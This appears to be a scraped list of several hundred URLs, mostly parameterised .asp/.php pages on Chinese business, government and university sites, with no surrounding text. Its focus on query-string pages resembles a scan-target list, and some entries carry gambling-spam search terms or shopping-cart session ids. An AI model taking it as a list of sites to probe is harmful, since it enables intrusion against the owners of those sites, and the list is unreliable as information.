http://www.semservice.net/Contact.asp?id=1 http://www.semzu.com/imgnewshow.asp?id=87 http://www.senlia.com/news_show.asp?id=116 http://www.senmashop.com/forum.php?mod=rss&auth=0 http://www.sensor4you.com/newss_data.php?cid/97.htm http://www.sensorshome.com/exp.asp?uid=203 http://www.sentaidiban.com/about/index.php?news_id=4 http://www.sentronics.cn/en/show_p.asp?id=703 http://www.seo2006.com/asked_questions.asp?id=11 http://www.seo33.com.cn/about.asp?id=352 http://www.seocnw.com/company.asp?id=24 http://www.seo-k.cn/website/help.asp?id=35 http://www.seook.net/rss.php?auth=0 http://www.seowf.cn/newanswer.asp?id=870 http://www.sesutq.com/ses/Product_info.asp?id=788 http://www.sfajx.cn/about.asp?id=25&cna=%E7%BB%84%E7%BB%87%E7%BB%93%E6%9E%84 http://www.sfgyyl.cn/about.asp?id=1 http://www.sfjart.com/rss.php?auth=0 http://www.sfjiancai.com/cpzs.asp?smallclassid=28 http://www.sf-plastic.com.cn/en/news_detail.asp?id=454 http://www.sg-baoan.com/about.php?tid=9 http://www.sgfsj.com/p.aspx?strClass=36 http://www.sgs.co.za/en/~/link.aspx?_id=BF435EF592424CFF870A598F5F2845C7&_z=z http://www.sgsgroup.com.cn/404.aspx?item=web%3a%7b457EA7E5-AF22-4232-9A39-A0AA87384171%7d%40zh-CN http://www.sgsgroup.com.ua/ru-RU/Automotive.aspx?p=1 http://www.sgwenshidapeng.com/ExmapleDetails.aspx?id=8 http://www.lib.lnnu.edu.cn/zhuanlan/reading/list.asp?classid=1 http://yjsy.fzu.edu.cn/dd_list.asp?newid=19580&classid=928 http://www.newguilin.com/photo-tour-view.asp?id=4 http://www.raybosuye.com/city_index.aspx?city=haerbin http://www.hzhm.net/NewsShow.asp?ID=282 http://www.ntjcrg.com/newsdetail.asp?newsid=79 http://www.hyygg.com/gangguganc/shownews.asp?id=1106 http://www.bibiku.net/soft_list.php?catid=1 http://www.huangdenglong.com/about.asp?id=5 http://cxtt.cn/colourweave/product.php?class1=7&class2=16 http://www.lywcwj.com/info.asp?id=2 http://www.hilem.cn/show_gonggao.asp?id=21 http://jpkc.zzti.edu.cn/Announcement/Announcement.asp?AnnounceId=5 http://ywxk.heuet.edu.cn/show.jsp?id=36 http://www.dqjljs.com/projects_view.asp?id=562 http://www.ahssgsl.com/SysFile/list.asp?catID=1&classID=1 http://www.zhangdudu.cn/weibo/Content.asp?t=47 http://www.xhhbzj.com/Newsshow.asp?id=21 http://www.huiyemoju.com/about.asp?id=1 http://www.wanli808.com/fznews.asp?id=1197 http://www.dgpeixun.cn/info.asp?id=1 http://finance.whu.edu.cn/web3/content.aspx?lb=zc http://www.sxfda.cn/display.asp?id=12614 http://www.kshtwuliu.com/News_detail.asp?id=248 http://www.soocc.com/forum.php?mod=rss&auth=0 http://www.bjhqtc.com/ythcp_display.php?id=103 http://www.nmgjyg.com/shop.aspx?CID=437 http://www.sdcfsm.com/city_index.aspx?city=shandong http://jrxy.zufe.edu.cn/index.jsp?urltype=tree.TreeTempUrl&wbtreeid=1957 http://www.jqzsb.com/case/xx.asp?id=4 http://www.daigou11.com/newsmore.asp?big=1 http://cartoon.twt.edu.cn/sub_fanzu.php?id=308 http://zhongyibags.com/products-cate.asp?cid=4 http://www.hxmbj.com/info.asp?id=1 http://gzlchina.com/about.asp?bid=67 http://bec.jnu.edu.cn/Dynamicindex.aspx?type=4 http://news.sdp.edu.cn/show_news.php?id=4314 http://www.qilupaint.com/about.asp?NID=636 http://www.jcochb.com/readnews.asp?id=36 http://www.cnfcwd.com/cn/newshow.asp?id=469 http://pxjd.ynnu.edu.cn/News/View.asp?action=list&id=123 http://www.fabricschina.com.cn/AdDetail.asp?id=13 http://confucian.ruc.edu.cn/jgsz.php?cid=28 http://zy.imau.edu.cn/xcbm/clgc/gonggao.asp?id=30 http://www.caitubandai.com/city_index.aspx?city=shan http://xcb.huat.edu.cn/NewsList.aspx?Num=5 http://www.cccir.sdu.edu.cn/td.asp?parent=64 http://yl.lhmc.edu.cn/news_more.asp?lm=44 http://www.yyseedling.com/product.asp?typeid_i=153 http://jyxx.pdsu.edu.cn/list.asp?BigClassID=24 http://rsc.buaa.edu.cn/index.jsp?lang=CH_S http://www.econ.sdu.edu.cn/bkjx/list_all.php?sortid=117 http://old.sdjtu.edu.cn/picshow.asp?piccat_id=3 http://www.wql001.com/xianhuoshow.asp?id=63 http://www.htsljx.com/zx/zx/look.asp?id=5068 http://www.szworkshop.com.cn/about.asp?id=5 http://www.zjg.net.cn/Cpsy/CpsyView.asp?id=2228 http://nucic.ruc.edu.cn/more.php?cid=273 http://www.xalhgg.com/about.asp?id=1 http://fxylib.whu.edu.cn/libresource/giftlang.php?LID=0 http://www.hkuspace.edu.cn/news/news_more.asp?lm=102 http://office.yeu.edu.cn/bigclass.asp?bigclassid=3 http://xyh.cncnc.edu.cn/lxwm.asp?id=2 http://www.lyjymc.com/about.asp?id=4 http://221.192.198.190/portal/xzsp_xianqu/article.aspx?columntitle=%e4%b8%ad%e5%bf%83%e4%bb%8b%e7%bb%8d http://00471.net/news_content.aspx?c_id=411&n_id=1233 http://china-headman.com/news/gb/list.asp?ID=34 http://www.spanimal.cn/date_frame.asp?special_num=B0033 http://www.gangting.cn/cn/job/online.asp?id=27 http://www.jxnskt.com/new_show.asp?showid=646 http://tw.zjiet.edu.cn/gzzd.asp?frame=showGzzd&news_ID=69 http://xssq.ustc.edu.cn/column.php?cid=1 http://xiaoyou.lixin.edu.cn/default.php?mod=article&settype=0&fid=11 http://ssp.lib.sjtu.edu.cn/browse.php?o=l http://hos.nenu.edu.cn/culture.asp?id=4 http://www.dlrj.edu.cn/Details.aspx?infoId=86 http://zlgc.ynnu.edu.cn/news.aspx?id=11 http://www.123go.cn/index.asp?ID=12162&CaiShiID=5283&AreaCode= http://www.123yanjing.cn/frameList.aspx?StyleID=72 http://www.12jin.com/home.php?mod=task http://www.130-188.com/ArticleShow.asp?ID=94 http://www.13173.net.cn/common.asp?id=1 http://www.13365336060.com/info.asp?id=3 http://www.13826005855.com/products.asp?smallid=1 http://www.13949955982.com/about.asp?id=5 http://www.13rs.com/news.aspx?id=392 http://www.151400.com/do/friendlink.php?job=apply http://www.1515u.com/bbs/Capturing/ShowTopic.asp?TopicID=48 http://www.158miaomu.com/wkp2/info_article.asp?id=284 http://www.15crmog.com.cn/cpshow.asp?id=48 http://www.167.gov.cn/167jtcontent.aspx?ArticleID=781 http://www.16858888.com/news.asp?id=1 http://www.168caizi.com/cp.asp?classid=1 http://www.16guilin.com/car/show.asp?id=13 http://www.16mn-wfgg.com/small_address.asp?id=319 http://www.172586.com/forum.php?gid=1 http://www.17itravel.com/tripDetails.aspx?id=357 http://www.17qgjx.com/forum.php?mobile=yes http://www.17shiliao.com/plus/search.php?keyword=%CD%F8 http://www.17sys.com/fwxxlist.asp?fid=3 http://www.17-u.com.cn/line_view.asp?productno=712 http://www.181398.com/plus/search.php?keyword=ui http://www.1819.tv/jscd.asp?xl=111 http://www.18867758666.com/news_look.asp?id=185 http://www.188km.com/content.php?id=4230 http://www.18kmw.com/sd_about.asp?id=1 http://www.18wjj.com/conx.asp?id=277 http://www.19216811.com.cn/plus/search.php?keyword=%D0%DE%B8%C4%C2%B7%D3%C9%C6%F7%C3%DC%C2%EB http://www.1949golf.com/plus/search.php?keyword=as http://www.1980xd.com/Modern/newsList.aspx?type=12 http://www.1998wsgj.com/en/news_display.php?id=14 http://www.1fml.com/Case.asp?BigClassID=2 http://www.1inj.cn/search.php?mod=forum&srchtxt=%BB%EE%B6%AF&formhash=fabc32cb&searchsubmit=true&source=hotsearch http://www.2008you.com/about.asp?aid=32 http://www.2014jordan.net/index.php?main_page=shopping_cart&zenid=9c1odgc87sl5viiejr6aejem37 http://www.2014shijiebei.net/forum.php?mobile=yes http://www.20ggangguan.net/xianhuoshow.asp?id=55 http://www.21257.com/List.asp?cid=1 http://www.2198.com/site/Proseckill.aspx?kid=49 http://www.21artedu.com/news.asp?nid=7 http://www.21marina.com/home.asp?page=2 http://www.21njky.com/product.asp?id=166 http://www.220183.com/alist.asp?id=17 http://www.2212888.com/news_show.asp?id=318 http://www.23w.net/Caselist.asp?Yid=36 http://www.24jq.com/forum.php?gid=58 http://www.288job.com/Resume.asp?PID=66128 http://www.28buv.com/item_dm.asp?id=16 http://www.28web.cn/case.asp?id=28 http://www.299120.com/wkview.aspx?newsid=27 http://www.2hong.com/plus/search.php?kwtype=0&searchtype=title&q=%D0%A1%C8%FD http://www.2jiewu.com/forum.php?mod=rss&auth=0 http://www.300shop.net/index.php?main_page=shopping_cart&zenid=03dae8a245e635a266410149be958e99 http://www.301718.cn/product/viewpic.asp?id=5229 http://www.3040762.com/catalog.asp?tags=%E7%A1%AC%E7%9B%98 http://www.310316309.com/product/product.php?class1=90 http://www.310sgg.com/new_show.asp?id=107 http://www.zjgshm.com/nbgs/Product_info.asp?id=1203 http://www.0731pxw.com/html.asp?showid=1 http://www.3m2131.com/base_info.asp?id=1 http://www.sxlyzy.edu.cn/newsxzy/majorview.asp?pid=164 http://www.ytjzy.com/info.asp?id=1 http://ccce.its.csu.edu.cn/xsgz/news.asp?sid=23 http://www.jzyy1949.com/znks.asp?ksid=5 http://www.sztyfhcl.com/newstitle.asp?id=36 http://mse.hust.edu.cn/about.php?catPath=0,50,59&catID=60 http://csun.upc.edu.cn/show.asp?listid=300 http://www.gxtcmu.edu.cn/show.aspx?id=13229 http://law.bjtu.edu.cn/detail.asp?mtype=1&num=1&id=129 http://glxy.cuit.edu.cn/other/Treadnews.asp?TNewsId=415 http://rsc.nchu.edu.cn/bigclass.asp?id=3 http://www.oldqlshx.sdnu.edu.cn/news_more.asp?lm2=2 http://www.noblesseobligeventi.com/portfolio.asp?categoria=Eventi http://www.security.buct.edu.cn/category.asp?typeid=1 http://jhzmba.com/book.asp?pid=516 http://estudy.hubu.edu.cn/downcontent.aspx?id=217 http://www.ziboguntong.com/about.asp?id=1 http://www.cnxjc.cn/news.asp?nlt=8 http://www.myiq365.com/IQImage/ImageInfo.aspx?type=4&gid=ddd9c3e4-65b6-4da2-8916-3a025cdadf5b http://www.jianzhi5.net/plus/search.php?q=%E4%BC%98%E5%8D%9A%E5%BD%A9%E7%A5%A8%E5%B9%B3%E5%8F%B0 http://www.syyd.net/djlist.asp?id=458 http://www.sanmeijingshui.com/Cn/intro.asp?id=1 http://www.maigewall.com/info.asp?id=1 http://www.fcl.org.cn/Intro.asp?Snt=8&id=57 http://www.bcxsq.com/product.php?type_id=7 http://www.lm9999.cn/info.asp?id=10 http://www.tjruiyuan.com/column.asp?baseid=2&tid=2001 http://www.phy.nenu.edu.cn/list2.php?id=45 http://tw.lixin.edu.cn/default.php?mod=article&fid=1 http://www.sdau.edu.cn/yjs/v2.0/lanmu.php?lid=27 http://www.qrnu.edu.cn/800readnews.asp?id=13439 http://ldgh.lzu.edu.cn/list.asp?id=570 http://dqxy.lzjtu.edu.cn/articles.php?artid=2421 http://cwc.ncu.edu.cn/show.asp?id=245 http://www.glit.edu.cn/glitwy.asp?id=362 http://www.jjhqbf.com/about.asp?sid=6 http://www.xzfhcy.cn/news_detail.asp?ids=25 http://hzzqjx.com/newsdetail.aspx?id=1785&class_id=1&tq=34 http://www.hnpi.net/tp2006/pl_view.asp?lb=11 http://www.sdchenyu.com/article_show.asp?id=197 http://www.xh.org.cn/newsshow.asp?id=76 http://www.dfzpw.net/newsinfo.php?id=1675 http://www.haisong.biz/plus/singlepage.php?sid=18 http://www.ebohua.com/Company.asp?id=43 http://www.ebud.net/ebudfilm/filmintro.asp?fm01ide=556 http://www.ec2hk.com/plus/search.php?q=%E4%B8%9C%E6%96%B9%E5%A4%AA%E9%98%B3%E5%9F%8E http://www.ec517.com/Diary.aspx?type=58 http://www.eccsp.org/sitecn/aspx/bzzx.aspx?tid=1648 http://www.ecegp.com/english/news/shownews.asp?ID=738 http://www.ecerb.gov.cn/aqscy_m.jsp?typeid=1519 http://www.e-chance.com.cn/about.asp?id=7 http://www.echushi.org/help.asp?sort_id=7 http://www.ecojoy.cn/nes_show.asp?B_ID=548&P_Class=5 http://www.ecpump.com/about.asp?Id=9 http://www.ecsh-dl.com/about.php?tid=333 http://www.edsoyo.com/article.php?cid=1 http://www.edu-gzstats.gov.cn/show/showarticle.asp?ID=770 http://www.eduie.org/plus/search.php?keyword=A&searchtype=initial&typeid=2 http://www.edulife.com.cn/wangluo/huadongligong/zhuanye.aspx?id=1597 http://www.edutrain.cn/NewsCover.aspx?Id=3 http://www.eeway.cn/plus/search.php?search_page=1&keyword=1%E5%85%8B%E6%8B%89%E9%92%BB%E6%88%92 http://www.e-fanyi.net/main/MainSub.asp?Id=1731 http://www.ejatec.com/kind1.asp?id=267 http://www.ekangcn.com/TXL/web/news/newsNote.php?id=100 http://www.elaian.cn/plugin.php?id=zzzai_lastthread&view=t&page=1 http://www.elejie.com/forum.php?mod=viewthread&tid=18293 http://www.elephant-china.com/news_list.asp?type1_id=70 http://www.eletrans.com.cn/about.php?Id=280 http://www.elizabeth-w.com/category.asp?nclassid=585 http://www.emar.com.cn/news.php?id=9 http://www.emingzx.com/ldw3/Product_info.asp?id=1695 http://www.emjiasheng.com/product_detail.asp?id=145 http://www.emjob.com/ArticleList.aspx?newTypeId=8 http://www.emmacreation.net/pro.asp?ClassID=13 http://www.emonit.cn/rss.php?auth=0 http://www.emseos.com/forum.php?mod=rss&auth=0 http://www.e-nai.cn/index.php/NewTrends/index?id=205 http://www.encolor.com/ArticleShow.asp?ArticleID=377 http://www.energyleague.com/index.php?a=imp http://www.enging.com.cn/waijiaofengcaineirong.aspx?id=7 http://www.enov.cn/news_1.asp?cla1=7&cla2=35 http://www.enricgroup.com/productslist.asp?sortid=125 http://www.enterethiopia.com/about.php?abid=1 http://www.eoeandroid.com/member.php?mod=logging&action=login&referer= http://www.ep2001.com/design_details.aspx?id=92 http://www.epa1973.com/news/newsinfo.asp?newsid=12006 http://www.ept.com.cn/pro_visa/class_visa.asp?Page=2&Var_pageCount=30&Version=v2.0 http://www.epxbh.com/epxb/Product_info.asp?id=990 http://www.eqrlj.com/New_list.asp?FormKey=t_ZWXX_Class&SenFormKey=t_ZWXX&SenName=%E5%85%AC%E5%91%8A%E5%85%AC%E7%A4%BA&OneName=%E6%94%BF%E5%8A%A1%E4%BF%A1%E6%81%AF&SenFormKeyId=72 http://www.erci-china.cn/news_help_show.asp?brand_typeid=10 http://www.erdostjgzc.com/page.asp?id=612 http://www.ergdq.com/product_show.asp?id=70 http://www.erpw.net/read.asp?id=1 http://www.erquan.com.cn/display.asp?id=48 http://www.erzilongxia.cn/article.asp?id=5 http://www.esjsp.com.cn/ssti/Product_info.asp?id=750 http://www.esjzd.com/about.asp?c=1 http://www.esurong.com/lczq.jsp?type=3&ntype=2 http://www.eswtj.com/newsinfo.asp?id=1296 http://www.etelecom.cn/shortshow.asp?id=347 http://www.etidea.cn/news.asp?id=3 http://sce.ncu.edu.cn/info.asp?id=801 http://www.yjsb.com.cn/article.asp?id=774 http://www.pausal.org.cn/cgtj/cgtj.asp?leibieid=4 http://www.shyhr.cn/info.asp?id=1 http://www.tzcjdz.com/InfoProductView.asp?id=2633 http://www.czlkfm.com/productd.asp?lid=14 http://student.uoh.edu.cn/list.asp?sort_id=657 http://ky.ndnu.edu.cn/Lectureinfo.asp?id=2 http://jwc.just.edu.cn/shownew.aspx?id=1344 http://xyy.nwsuaf.edu.cn/c_news.php?sortid=2 http://zjc.jju.edu.cn/new/detail.asp?n_id=50030 http://road.hncc.edu.cn/About/About.asp?ID=8 http://xsc.syau.edu.cn/cwf/info.asp?MenuID=14 http://www.haoshunguanjian.com/city_index.aspx?city=liaoning http://zlgc.jmu.edu.cn/show.asp?fid=1 http://jdx.jsit.edu.cn/look_page_big.asp?yiid=57 http://www.cdxymm.com/cdxy/Product_info.asp?id=1084 http://www.wfganzaoji.com/info.asp?id=1 http://www.roofonline.cn/news.php?sort=169 http://www.xutairubber.com/employ_more.asp?unid=221 http://fazhanzx.sqnc.edu.cn/newshow.asp?id=328 http://www.szsjjwx.com/News_detail.asp?id=194 http://bwc.hntbc.edu.cn/info.asp?s=9 http://www.yjjob.com.cn/zczx/sort.php?ID=1 http://hqjt.zjnu.edu.cn/hq_communist_work/article_content/article_content_Default.asp?id=3520 http://www.yohen.net/company.asp?id=2 http://www.ean98.com/car.php?t=esm&n=10173 http://www.zgqzsy.com/about.asp?id=1 http://www.gcclqxj.com/info.asp?id=1 http://www.hyyhht.com/Product.asp?BigClassID=39 http://std.nuc.edu.cn/List.aspx?kind=44 http://cjc.sysu.edu.cn/further.asp?Id=73 http://www.hebeipiano.com/city_index.aspx?city=hebei http://cree.sdust.edu.cn/jxw_news.asp?ppclassid=197 http://yxsfzx.njmu.edu.cn/about.asp?cid=%D6%D0%D0%C4%BC%F2%BD%E9 http://www.sdwsjs.com/info.asp?id=1 http://www.yztgg.com/plus/advancedsearch.php?mid=7&typeid=15 http://www.huaqianghj.com/showproduct.asp?id=157 http://www.cqhdbf.com/contact_view.asp?keyno=3 http://www.zgtjh.com/ypnew_list.asp?id=46 http://jgxy.cug.edu.cn/xgz2007/News_Class.asp?ClassID=49&RootID=1 http://zdh.qust.edu.cn/list.asp?ClassId=39 http://english.cumtb.edu.cn/info.php?id=81 http://www.newjiaju.com/help.php?aid=13 http://www.zsyyt.com/tzgg.php?id=20 http://www.sinojqksb.com/city_index.aspx?city=jiangsu http://www.wm5201314.com/newsbrow.asp?cid=733 http://www.wmsub.com/rss.php?auth=0 http://www.wnhb.gov.cn/show.aspx?id=10596 http://www.wnk.cn/showgg.asp?id=144 http://www.wnsyj.com/products.asp?nclassid=146 http://www.wonston.cn/product_show.asp?id=158 http://www.wooddoorqd.cn/about.asp?id=1 http://www.woojong.com.cn/certificate_.asp?classid=3 http://www.woolmarket.com.cn/NewsList.aspx?id=25 http://www.woooo.cn/views.asp?id=781 http://www.worldexh.com/BizList.asp?ClassID=97 http://www.world-stone.com/product_show/lista.aspx?nid=%e8%98%91%e8%8f%87%e7%9f%b3&bid= http://www.woyaozhan.com/index.php/Product/index?type1=1 http://www.wozhuce.com/showx1.asp?Tid=202 http://www.wqdrygl.com/cp_show.asp?id=41 http://www.wqhouse.com.cn/qgxq.asp?id=5052 http://www.wqit.net/page.php?cid=21 http://www.wr0566.com/forum.php?mobile=yes http://www.wsciot.com/news.php?module=news&classpid=2 http://www.wscjwx.com/plus/search.php?q=3344111.com http://www.wscljs.com/info.asp?id=1 http://www.wseduncc.com/About_Win.asp?id=1 http://www.wsgcindiaweek.com/newsshow.asp?id=841 http://www.wshtm.com/plus/search.php?q=%E5%85%A8%E8%AE%AF%E6%96%B02 http://www.wsnews.com.cn/Default_mbjx.aspx?templateid=75&Class_ParentID=166 http://www.wspfw.cc168.cc/news_info.asp?cid=0&tid=333&dataid=962 http://www.wsxw.gov.cn/bbs/forum.php?mod=forumdisplay&fid=2 http://www.wsxx120.com/show.asp?Cid=281&ID=134 http://www.wubilx.cn/plus/search.php?keyword=%CE%E5%B1%CA%B4%F2%D7%D6%C1%B7%CF%B0 http://www.wugangdaopian.cc/newsshow.asp?id=685 http://www.wugongshan.org/news.asp?xid=22 http://www.wuhanmsa.gov.cn/message.aspx?id=0 http://www.wuhujt.com/article.php?id=24 http://www.wuhy.net/hmhs/Product_info.asp?id=2344 http://www.wujiuwenxue.com/modules/article/index.php?fullflag=1 http://www.wulanchabu.gov.cn/wlcbsearch.jsp?title_content=all&keyword= http://www.wulingshan.com.cn/news.asp?id=1 http://www.wuliu123.cn/gg/gg.aspx?id=1 http://www.wust.com.cn/forum.php?mod=rss&auth=0 http://www.wutaimb.com/ProductList.aspx?BigClassId=144&SmallClassId=165 http://www.wuweijob.com/News_More.asp?NewsTypeId=42 http://www.wuxijinli.com/english/news.asp?nlt=13 http://www.wuxiky.com/news_content.aspx?newid=260 http://www.wuxingwxw.com/xiangmu.asp?typeid=121 http://www.wuxisj.com/news.asp?nlt=24 http://www.wuxitengye.com/products_s.asp?id=1068 http://www.wuxiyibiao.com/productshow.asp?lt=1386 http://www.wuyiwj.com/news_view.asp?id=99 http://www.wuzhong.zp300.cn/zczx/sort.php?ID=1 http://www.wuzhoucn.net/jt/newshow.asp?id=2995 http://www.w-valve.com/products.asp?bid=1839 http://www.wwdjdq.net/chanpin.asp?id=1035 http://www.www.51hwz.net/rss.php?auth=0 http://www.wx12cr1movg.com/12cr1movghejingangguan-1.asp?id=886 http://www.wxaefi.org/shownews.asp?lt=542 http://www.wxbaijia.com/gcbz.asp?id=14 http://www.wxbaoli.com/product.asp?id=7 http://www.wxbjw.cn/shownews.asp?lt=699 http://www.wxbxghg.com/zixun.asp?id=27 http://www.wxchina.net/news.asp?classid=58 http://www.lan-wisdom.cn/newsdetail.php?id=18 http://sbc.fjmu.edu.cn/newsByType.asp?typeid=2 http://www.xhyuanyang.com/product.asp?id=1 http://kjxy.hrbcu.edu.cn/WebXygk.aspx?from=top&Cid=1 http://rjxy.hnzj.edu.cn/showNews.asp?type=0&id=69 http://zsjy.cqjtu.edu.cn/jyw/ShowResume.aspx?StuID=10940104 http://job.bnuz.edu.cn/com_job_list.asp?id=1748&com_id=1654 http://xyh.cdu.edu.cn/schnewslist.php?id=2 http://pxb.nenu.edu.cn/class_list.php?fid=5 http://pinggu.hnfnu.edu.cn/list.php?id=2 http://icec.sisu.edu.cn/kyjg.asp?id=12 http://www.oocat.net/about.asp?id=1 http://sjc.njfu.edu.cn/info.php?id=64 http://rc.usst.edu.cn/list.php?newsid=11 http://sjc.cumt.edu.cn/lanmu.aspx?lanmuid=%e6%96%b0%e9%97%bb%e5%8a%a8%e6%80%81 http://www.gxic.net/vote.asp?id=1 http://www.wzjmsfs.com/prodisp.asp?cpid=403 http://cme.hrbmu.edu.cn/ggxx.aspx?ggid=109 http://www.xbzx.ynu.edu.cn/DownLoad/Show.aspx?id=64 http://eel.xmu.edu.cn/news_browser.php?id=1385112560 http://www.timedate.cn/mytime.asp?n1=1&n2=394&n3=448&n4=539&n5=201&n6=213&n7=150&n8=128&n9=47&n10=329 http://www.yx67.com/NewsMore.asp?id=12 http://snjxdyxs.com/English/news_show.asp?code=wz0000000000021 http://www.yanyi100.com/teacher_show.asp?id=28491 http://www.wxqzzz.com/product.asp?Pone=1 http://wykyw.hebut.edu.cn/active.php?cat=1 http://www.chinasjw.net/news_detail.asp?NewsId=121 http://spa.njnu.edu.cn/show.asp?id=3000 http://www.jnyxlb.com/newsn.asp?id=280 http://departs.glut.edu.cn/jgdw/class.asp?id=24 http://cxzy.huat.edu.cn/NewsList.aspx?num=1 http://zyz.qau.edu.cn/Newsview.asp?id=251 http://djsz.lumei.edu.cn/images.asp?titleID=35 http://mba.njfu.edu.cn/news.asp?classid=146 http://zbb.shu.edu.cn/graduateweb/news/viewnews.asp?id=9171&type=10 http://cie.upc.edu.cn/cie/news2.aspx?id=%E6%A6%82%E5%86%B5 http://www.cnmjshw.com/newsshow.asp?id=774 http://www.nx1001.com/misc.php?mod=faq&action=faq&id=4 http://www.xxddjzm.com/abouts.php?id=9 http://www.szgjp.com/cp.asp?Product_ID=1334 http://www.ahjdf.cn/newshow1.asp?id=95 http://www.ssc83.com/plug/tags.asp?tag=%E5%85%AD%E5%90%88%E5%BD%A9%E7%9B%B4%E6%92%AD http://www.ynzhsj.com/city_index.aspx?city=kunming http://www.mvtom.com/about.asp?tmpId=25 http://www.imautokey.com/shownews.asp?id=64 http://www.cdhaierweixiu.com/new.asp?id=900 http://www.bcm-art.com.cn/shop/productshow.asp?plt=1498 http://www.bdhnjlg.com.cn/lvguan1.asp?id=239 http://www.bdhzyh.com/show.asp?id=1477 http://www.bdjtc.com/info.php?class=64 http://www.bdlvdi.cn/bdld/product_info.asp?id=299 http://www.bdsanding.com/info.php?pid=9 http://www.bdsczj.net/pics_list.php?class=59 http://www.bdshw.com/class.asp?id=399 http://www.bdsj.cn/plus/search.php?keyword=%E9%98%B3%20%E7%97%BF http://www.bdsjsj.com/news_view.asp?id=175 http://www.bdweichang.com/plus/search.php?q=%CE%B8%C8%C8%BF%DA%B3%F4&w=+ http://www.bdxzfw.cn/bdsdzjcxt/portal/dzjc/qzpy/default.aspx?OrgID=100 http://www.bdzf.org/news.asp?ClsID=16 http://www.bdzhjx.com/LinkfriendLinks.asp?lmid=24 http://www.bdzhongyou.com/display_new.asp?id=218 http://www.beauty.com/list.asp?catid=10782&trx=newgn_10782 http://www.bechina.org/case_detail.asp?ParentID=65&News_ID=2457 http://www.beihaily.com/about.php?id=1 http://www.beihaimj.com/activityView.asp?id=66 http://www.beihu.gov.cn/qy/guest_show.asp?id=22 http://www.beijingguohuayuan.com/hyld_show.asp?id=222 http://www.beijingqiang.net/download.asp?dl=20 http://www.beishanjiaxiao.com/newsinfo.asp?id=430 http://www.beishanws.com/forum.php?mobile=yes http://www.beitaiele.com/product_show.asp?id=833 http://www.beitang.zp300.cn/zczx/sort.php?ID=1 http://www.beiweihy.com.cn/cases2copy.asp?industry=1 http://www.bekesen.cn/htm/about.asp?id=16 http://www.bendi-bao.cn/news.asp?keyno=11105 http://www.benychina.com/about.asp?classid=21 http://www.best9000.com/rss.php?auth=0 http://www.bestirtools.com/pview.asp?id=2458 http://www.betterracks.com/product.asp?classid=2 http://www.bfamcmc.edu.cn/about/index.asp?id=17 http://www.bfjkw.org/jynew.asp?id=1490 http://www.bgmic.com/about.asp?id=2 http://www.bha.com.cn/Newsshow.asp?id=15 http://www.bhbikes.cc/news/show.asp?id=212 http://www.bhql888.com/art.php?id=60 http://www.bhtbnt.com/cityph_d.asp?product_class=5 http://www.bhtour.cn/car/show.asp?id=20 http://www.bhzb.gov.cn/q_flfw.asp?lm_id=1023 http://www.biaoyu.cc/gonggao_do.asp?id=1649 http://www.bidblog.cn/plus/search.php?keyword=%CD%F8%C2%E7 http://www.bijsc.com/article.asp?class=1 http://www.bilantian.cn/plus/search.php?keyword=%E6%96%B0%E9%97%BB%E8%90%A5%E9%94%80 http://www.bingjiaday.com/b1.asp?id=952 http://www.bingxi.net/rss.php?auth=0 http://www.binhai.zp300.cn/zczx/sort.php?ID=1 http://www.binlitex.com/product_06.asp?id=525 http://www.binzhoushaiwang.net/series.asp?id=72 http://www.bio-foto.com/index.php?lang=czech http://www.biohitchina.com/about.asp?id=12 http://www.bitcongress.com/allconferencesarea.asp?m=0 http://www.bitfr.com/display_new.asp?id=79 http://www.bitmap3d.com.cn/ShowComPro.php?ComProCatID=1 http://www.bitpress.com.cn/index.php?id=6 http://www.biyingfood.com/Newsshow.asp?id=14 http://www.biz-beijing.org/buchmesse.php?id=20 http://www.bj9966.cn/showhelp.asp?id=227 http://www.bjbaoguan.com/news_show.asp?id=321 http://www.bj-baozhuang.com/detail.php?id=12 http://www.bjcarbon.com.cn/news_ny.asp?artid=174 http://www.bjcmjj.com/Product.aspx?kid=1 http://www.bjctc.com.cn/show.asp?id=354 http://klas.cuit.edu.cn/newsrd.asp?newsid=20140627182259&newsno=399 http://lib.gipe.edu.cn/showlan.aspx?sjid=0&id=2 http://www.hnkangtu.net/about.asp?bigid=1&smallid=58 http://keji.qau.edu.cn/news1/kjnew1.php?id=818 http://www.wxgg10.com/news1.asp?id=2058 http://zsjy.ustl.edu.cn/xxgk.asp?id=264 http://jwc.zqu.edu.cn/Navigation.aspx?FN=1 http://www.m1628.com/case.asp?sid=57&bid=1 http://www.zgxysy.com/rss.php?auth=0 http://jxx.dgut.edu.cn/down.asp?id=67 http://www.njgsmach.com/cn/aboutus.asp?id=1 http://cls.cjlu.edu.cn/c/type.asp?typeID=14 http://wyx.zjc.edu.cn/xwzx/news_more.asp?lm=195 http://foundation.bjtu.edu.cn/newslist.aspx?id=7 http://www.ybzy.edu.cn/xqhz_xnsxgc_xx.aspx?uId=938 http://sbc.usts.edu.cn/ShiYanShi.aspx?NewsType=-301&TypeNo=-203 http://www.yadiantaoci.com/Products.aspx?id=3 http://yjsy.fzu.edu.cn/dd_list.asp?newid=19580&classid=928 http://www.sdbnyz.com/news.asp?lei=45 http://www.shjfy.com.cn/office_msg_detail.php?id=1 http://www.wfmcjq.com/info.asp?id=3 http://www.bag0086.com/chineve_manager/message.asp?id=121 http://jgxyh.heuet.edu.cn/news.asp?class=xyxw http://tgsf.ynnu.edu.cn/otherCont.aspx?name=%E8%AF%BE%E7%A8%8B%E8%B5%84%E6%BA%90 http://zhaosheng.yzu.edu.cn/sort.asp?dy1=%B9%AB%B8%E6%C0%B8 http://fdc.ruc.edu.cn/displaynews_video.php?id=294 http://www.shanghaitoyexpo.com.cn/en/news_open.asp?id=171 http://grs.zmc.edu.cn/show.asp?id=715 http://www.wx-huawei.cn/product.asp?Pone=17 http://www.miaomuqk.com/ArticleClass_Show.asp?Class_ID=237 http://www.wjyt-china.org/jsp/toy/usershop/companyindex.jsp?shopname=beleduc http://www.rafeiyang.com/pro_list.asp?type_id=32 http://nic.xjtu.edu.cn/nclass.asp?id=20&c=1 http://rwjd.zjgsu.edu.cn/content/detail.php?sid=23&cid=514&id=1006 http://ctd.ruc.edu.cn/newslist.php?type=2 http://yb.nenu.edu.cn/cjwd2.php?aid=4872 http://www.zxin.net.cn/DemandList.aspx?demandType=2 http://218.87.136.5/haohao_list.php?haohao=news&id=4258 http://www.ut168.com.cn/article.asp?ID=566&sortid=112 http://www.gjssxy.com/cinfo.asp?id=139 http://www.tadhzj.com/news_show.asp?xx_nrfb_content_id=193 http://www.zdnyjd.com/newshow.asp?id=638 http://www.mitr.cn/gg_view.asp?id=126 http://www.mixini.cn/hj/ProductShow.asp?ID=1088 